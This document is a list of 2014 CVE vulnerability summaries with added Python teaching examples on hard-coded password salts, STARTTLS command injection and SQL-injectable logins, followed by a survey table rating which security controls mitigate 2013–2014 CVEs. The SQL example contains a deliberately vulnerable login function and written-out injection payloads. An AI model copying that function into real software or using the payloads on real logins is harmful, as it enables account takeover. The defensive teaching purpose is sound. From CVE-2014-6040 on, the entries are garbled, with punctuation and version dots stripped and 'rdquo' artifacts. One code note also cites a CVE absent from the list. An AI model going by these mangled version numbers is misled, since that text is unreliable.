CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2773.

CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.


CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.

CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.

CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.
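The CloudForms entry is a salting mistake rather than a hashing one. The following is an added example, not Red Hat's code: per-record random salts with PBKDF2-HMAC-SHA256 from the Python standard library, with the fixed-salt anti-pattern beside it so the consequence is visible: identical passwords produce identical hashes, and a single precomputed table cracks every record. The fixed salt string is constructed.

```python
import hashlib
import hmac
import os
from typing import Optional

ITERATIONS = 600_000        # PBKDF2-HMAC-SHA256 work factor; raise as hardware improves


def hash_password(password: str, *, salt: Optional[bytes] = None,
                  iterations: int = ITERATIONS) -> str:
    """Hash with a fresh 16-byte random salt per call. The output carries its
    own parameters ('pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>') so
    old records can be verified after the work factor is raised."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


# Constructed stand-in for a salt baked into the source tree.
HARDCODED_SALT = b"static-salt-in-git"


def hash_with_fixed_salt(password: str) -> str:
    """The anti-pattern: every record shares one salt. Two users with the
    same password get the same hash, and one rainbow table built for this
    salt serves against the whole database."""
    return hash_password(password, salt=HARDCODED_SALT)


def hashes_collide(password: str, hasher) -> bool:
    """Does hashing the same password twice give the same string?"""
    return hasher(password) == hasher(password)
```

The random-salt hasher never collides with itself, which is exactly the property a brute-force attacker is denied; the fixed-salt hasher always does.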

CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.
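The nginx entry is the STARTTLS plaintext-injection class first catalogued as CVE-2011-0411: bytes an attacker appends to the cleartext STARTTLS command sit in the proxy's read buffer, get processed after the handshake, and are therefore attributed by the backend to the encrypted, authenticated session. The following is an added example, not nginx's code: a small model of a proxy command loop with the vulnerable and fixed behaviour selectable, driven by constructed traffic in which the injected commands ride in the same TCP segment as STARTTLS.

```python
class SmtpFrontend:
    """Model of an SMTP proxy's command loop: CRLF-terminated commands are
    pulled from a read buffer one at a time, and STARTTLS flips the
    transport to TLS. Only the buffering behaviour is modelled; the
    handshake itself is not."""

    def __init__(self, discard_pipelined_on_starttls: bool):
        self.discard = discard_pipelined_on_starttls
        self.buffer = b""
        self.tls = False
        self.log = []       # (seen_under_tls, command) in backend order

    def receive(self, data: bytes) -> None:
        """Bytes arriving from the client side of the connection."""
        self.buffer += data
        while b"\r\n" in self.buffer:
            line, self.buffer = self.buffer.split(b"\r\n", 1)
            was_tls = self.tls
            self.handle(line)
            if self.tls and not was_tls and self.discard:
                # Fixed behaviour: anything already read alongside STARTTLS
                # arrived before the handshake, cannot be attributed to the
                # TLS peer, and is dropped instead of being replayed.
                self.buffer = b""

    def handle(self, line: bytes) -> None:
        if line.strip().upper() == b"STARTTLS" and not self.tls:
            self.tls = True         # a real proxy performs the handshake here
            return
        self.log.append((self.tls, line.decode("ascii", "replace")))


def run_session(discard_pipelined: bool) -> list:
    """Constructed traffic. The first segment is what a man-in-the-middle
    can send in cleartext: the victim's STARTTLS with two commands appended.
    The second segment is the victim's own first command under TLS."""
    fe = SmtpFrontend(discard_pipelined_on_starttls=discard_pipelined)
    fe.receive(b"EHLO client.example\r\n"
               b"STARTTLS\r\nRSET\r\nMAIL FROM:<attacker@evil.example>\r\n")
    fe.receive(b"MAIL FROM:<victim@example.com>\r\n")
    return fe.log


def injected_under_tls(log: list) -> list:
    """Commands the backend would believe came over the encrypted session
    but which were never sent by the TLS peer."""
    return [cmd for under_tls, cmd in log if under_tls and "attacker" in cmd]
```

The vulnerable configuration logs `RSET` and the attacker's `MAIL FROM` as TLS-protected commands ahead of the victim's; the fixed one discards the pipelined bytes and the victim's command is the first thing the backend sees after the handshake. The same discard is required on the client side of any STARTTLS protocol (SMTP, IMAP, POP3, FTP), which is the point the earlier CVE made.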

CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.
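The two login-page SQL injections in this list (CSP MySQL User Manager, CVE-2014-1466, and the D-Link DAP-1350 above) are the same defect. The following is an added example, not either vendor's code: the string-built query and its parameterised replacement run against a constructed SQLite user table, with the comment-terminator and `' OR '1'='1` payloads. Passwords are stored in clear here only to keep the query readable; a real store holds a salted hash and compares against that.

```python
import hmac
import sqlite3

# Constructed fixture standing in for a product's credential table
# (example schema, not the vendors' own).
def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT NOT NULL)")
    db.execute("INSERT INTO users VALUES ('admin', 'correct horse battery staple')")
    db.commit()
    return db


def login_vulnerable(db: sqlite3.Connection, username: str, password: str) -> bool:
    """The defect: both fields are interpolated into the statement text, so a
    quote in either one changes the query's structure. A trailing comment
    marker or an always-true OR clause logs in without a password."""
    sql = (f"SELECT 1 FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return db.execute(sql).fetchone() is not None


def login_safe(db: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised lookup: the driver sends the statement and the values
    separately, so quotes and keywords inside them are data. The password
    check is then done in code, in constant time, not inside the WHERE."""
    row = db.execute("SELECT password FROM users WHERE username = ?",
                     (username,)).fetchone()
    return row is not None and hmac.compare_digest(row[0], password)


COMMENT_PAYLOAD = "admin' --"          # terminates the statement after the username
TAUTOLOGY_PAYLOAD = "' OR '1'='1"      # makes the WHERE clause always true
```

With the vulnerable function, `admin' --` turns the statement into `... WHERE username = 'admin' --' AND password = '...'`, and the tautology makes the whole predicate true regardless of either field; the parameterised function treats both strings as usernames that do not exist.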

CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."

CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.

CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.

CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo

CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors

CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork

CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL

CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo

CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo

CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message

CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService

CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets

CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code

CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c

CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows

and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158

CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site

CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo

CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460

CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014

CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo

CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction


Survey Responses



Cyber Controls Applicability

CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0084 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0149 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-0172 | y | n | n | n | n | Not Mitigated | Mitigated - User Access (Strong Password), Patch Management
CVE-2013-0174 | n | n | n | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall, Patch Management
CVE-2013-0199 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration
CVE-2013-0253 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-0270 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0481 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0598 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0619 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0633 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Firmware Management
CVE-2013-0649 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Patch Management
CVE-2013-0746 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0753 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0787 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management
CVE-2013-0909 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1035 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1102 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-1144 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1153 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1181 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1303 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1384 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser)
CVE-2013-1388 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1450 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-1472 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Access Policy)
CVE-2013-1553 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1620 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1627 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1638 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1669 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1676 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1700 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management, Anti-Malware
CVE-2013-1734 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1777 | n | n | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-2319 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Firewall, Secure Configuration (Secure Browser)
CVE-2013-2340 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-2350 | n | y | n | n | y | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-2492 | y | n | y | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Firmware Management, Anti-Malware
CVE-2013-2736 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-2780 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2803 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords, Patch Management
CVE-2013-2824 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2826 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2920 | n | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3064 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3116 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3137 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware, Secure Configuration (Don't Install)
CVE-2013-3194 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3199 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3201 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3206 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3280 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-3387 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3417 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3632 | y | y | y | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall
CVE-2013-3656 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3856 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Anti-Malware
CVE-2013-3860 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3893 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration - no JS
CVE-2013-3897 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3900 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3905 | y | y | n | y | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4223 | y | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4436 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-4478 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration
CVE-2013-4529 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4555 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4776 | y | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-4782 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-5057 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5369 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5428 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-5431 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5494 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5507 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5536 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5559 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5561 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5751 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5757 | n | n | n | n | m | Not Mitigated | Mitigated - Firewall
CVE-2013-5828 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control, Secure Configuration (Cookie-deletion)
CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated - Anti-Malware, Firewall, Patch Management
CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration
CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated - Firmware Management
CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated - Boundary Firewalls include anti-DOS
CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management & SSL
